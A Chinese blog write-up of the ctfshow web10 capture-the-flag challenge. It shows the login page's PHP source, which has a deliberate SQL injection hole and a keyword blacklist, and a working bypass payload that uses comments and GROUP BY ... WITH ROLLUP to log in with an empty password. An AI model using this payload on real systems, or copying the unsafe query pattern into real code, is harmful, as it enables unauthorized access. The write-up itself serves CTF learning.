wp-ctfshow-web10 (group up注入)

最新推荐文章于 2023-10-13 21:32:08 发布
最新推荐文章于 2023-10-13 21:32:08 发布
阅读量142 收藏
点赞数 1
分类专栏: 网络安全 文章标签: php sql 网络安全 数据库 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bin789456/article/details/119987532
版权

wp

打开题目:
在这里插入图片描述
点“取消”下载源码:

<?php
		$flag="";
        function replaceSpecialChar($strParam){
             $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
             return preg_replace($regex,"",$strParam);
        }
        if (!$con)
        {
            die('Could not connect: ' . mysqli_error());
        }
		if(strlen($username)!=strlen(replaceSpecialChar($username))){
			die("sql inject error");
		}
		if(strlen($password)!=strlen(replaceSpecialChar($password))){
			die("sql inject error");
		}
		$sql="select * from user where username = '$username'";
		$result=mysqli_query($con,$sql);
			if(mysqli_num_rows($result)>0){
					while($row=mysqli_fetch_assoc($result)){
						if($password==$row['password']){
							echo "登陆成功<br>";
							echo $flag;
						}

					 }
			}
    ?>

屏蔽了大部分关键字。
这里要介绍到group bywith rollup
group by能够对结果按指定key进行排序,而with rollup 能够在此基础上再做汇总统计
效果就像这样
在这里插入图片描述
关键在于,虽然with rollup能够进行汇总,但是对于字符串,汇总结果就是NULL
这样就添加出了 username='xiaoming' password为空 一组数据。

所以构造payload:

username=admin'/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#&password=

解析:
这里闭合也不一定是admin ,保持为真即可。
并且,在源码中,是先筛选username,在返回结果中对比password是否相同。
加入payload后就是,筛选出所有结果,password为空,比对后正好有为空的密码,所以登录成功。

登录成功界面。
在这里插入图片描述

sayo.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 949
任务环境说明:服务器场景:Server1。
-------已搬运------CTFSHOW---WEB AK赛 -- 包含日志 ---sql注入 ---- xxe ----
Zero_Adam的博客
04-29 773
目录:web0_签到_观己一、自己做:二、学到的&&不足:web1_观宇一、自己做:二、学到的:三、学习WPweb2_观星00000+一、自己做:三、看WPweb0_签到_观己 一、自己做: 吐槽一句,ctfshow 的题就是 考知识点!! ,一点拖泥带水的。赞一个!!! <?php if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){ d
CTFshow web10
qq_52907838的博客
09-22 917
打开环境,是登录页面: 点击取消,自动下载源码文件index.phps: <?php $flag=""; function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,"",$strParam);//将上面字符串全替换为空 .
CTF.show:web10
qq_46230755的博客
01-15 709
web9一样。先查看一下源码, 右键查看源代码 进入style.css 发现有index.phps 在url处输入后,查看源码得到 <?php $flag=""; function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,"
ctfshow-WEB-web10( with rollup注入绕过)
热门推荐
wangyuxiang946的博客
09-05 1万+
ctf.show WEB模块第10关是一个SQL注入漏洞, 点击取消按钮可以获取源码, 审计代码可以发现源码中存在漏洞, 推荐使用with rollup注入进行绕过, 此关卡过滤了空格,and等关键字 1. 过滤空格, 可以使用括号()或者注释/**/绕过 2. 过滤and, 可以使用or来代替 进来以后是一个登录界面, 盲猜是SQL注入漏洞 点击取消按钮可以获取这一关的源码, 下载到本地即可 源码中先根据用户名查询用户信息, 用户名通过以后, 再判断密码是否相同, 我...
ctfshow-萌新-web10( 利用命令执行漏洞获取网站敏感信息)
wangyuxiang946的博客
09-10 1万+
ctf.show萌新模块 web10关,这一关考察的是命令执行漏洞的利用,闯关者需要知道3个以上PHP命令执行函数的使用,推荐使用passthru() 页面中展示了部分源码,并提示我们 flag 在 config.php 文件中 源码中过滤了 system,exec,highlight 这三个常用的PHP命令执行函数,绕过过滤条件就可以使用 eval() 函数执行PHP代码了,我们使用其他的命令执行函数即可,这里使用passthru()函数即可,先查看一下当前目录 ?...
WP2-ctfshow
最新发布
02-24
2
WP1-ctfshow
02-24
1
wp-clean-up.1.2.3.zip
10-16
《WordPress数据库优化插件——wp-clean-up》 在数字化时代,网站性能的优化至关重要,特别是对于基于WordPress构建的网站来说,高效运行与快速响应能够显著提升用户体验。wp-clean-up插件便是为此目的而生,其...
【ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4428
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
【CTFshow】Web1-Web10
weixin_51614272的博客
12-19 564
Web1-Web10Web1直接查看源代码Web2所以打不开控制台,无论按鼠标右键还是按f12,都看不了源代码查看源代码 通过在url头部添加 view-source:Web3什么都没有,抓包看看Web4robots协议Web5又是什么都没有,考察源码泄露index.php和index.phps大多数时候御剑后台扫描扫不出来。。。Web5-Web8:[学习这篇文章](https://blog.csdn.net/a597934448/article/details/105431367)Web6考察代码泄露,w
ctfshow web1-10
m0_50237943的博客
01-31 1886
CTFSHOW WEB(1-10) web1 签到题 F12,在注释里得到一串字符串,base64解码可得flag web2 最简单的sql注入 直接sqlmap一把梭 web3 考点是文件包含和PHP伪协议,可以利用php://input协议,在POST正文中写下PHP代码,被包含进去执行: 可以看到flag在ctf_go_go_go这个目录下,接着在cat一下就出flag了 web4 web4和web3类似,但是过滤了一堆php的伪协议,这时候想到可能是包含本地的什么文件,最后知道了是包含日志文件
CTFshow-web-web10
qq_68581192的博客
10-13 129
因为加入with rollup后 password有一行为NULL,我们只要输入空密码使得(NULL==NULL)即可满足。源码中先根据用户查询用户信息, 用户名通过以后, 再判断密码是否相同, 我们绕过用户名的过滤条件, 再使用 with rollup注入绕过密码。2.with rollup:group by 后可以跟with rollup,表示在进行分组统计的基础上再次进行汇总统计。点击取消键,意外发现触发一个下载任务index.phps文件,打开文件查看,显示如下。这样就能登录成功了。
ctf.show_web10
m0_56107268的博客
05-13 362
<?php $flag=""; function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,"",$strParam); } if (!$con) { die('C.
ROSE笔记-ctf.show_web10-WP
居上
11-08 302
ctf.show_web10取消按钮,查看到源代码 <?php $flag=""; function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,"",$strParam); } if (!$co
CTF show WEB10
羽的博客
02-17 4280
题目地址:https://ctf.show 打开页面点击取消按钮,出现源码。 $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; 从源码中可以得知几乎把注入用到的关键词过滤的差不多了。 正则表达式中的 /i 表明无法大小写和双写绕过关键词。 ...
CTFSHOW web入门——web10
m0_74093152的博客
02-05 250
CTFSHOWweb入门——web10
刷题之旅第30站,CTFshow web10
cc菜的一批
02-17 876
感谢ctf show平台提供题目 点击取消按钮,我们下载到了php文件。 <?php $flag=""; function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return...
CTF挑战:WP1-ctfshow解题攻略
"WP1-ctfshow" 这篇文章主要介绍了CTF(Capture The Flag)比赛中的若干种解题技巧,特别是针对网络安全Web安全领域的一些基本技术。CTF比赛通常涉及网络安全、逆向工程、密码学等多个领域,而这里的讨论集中在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值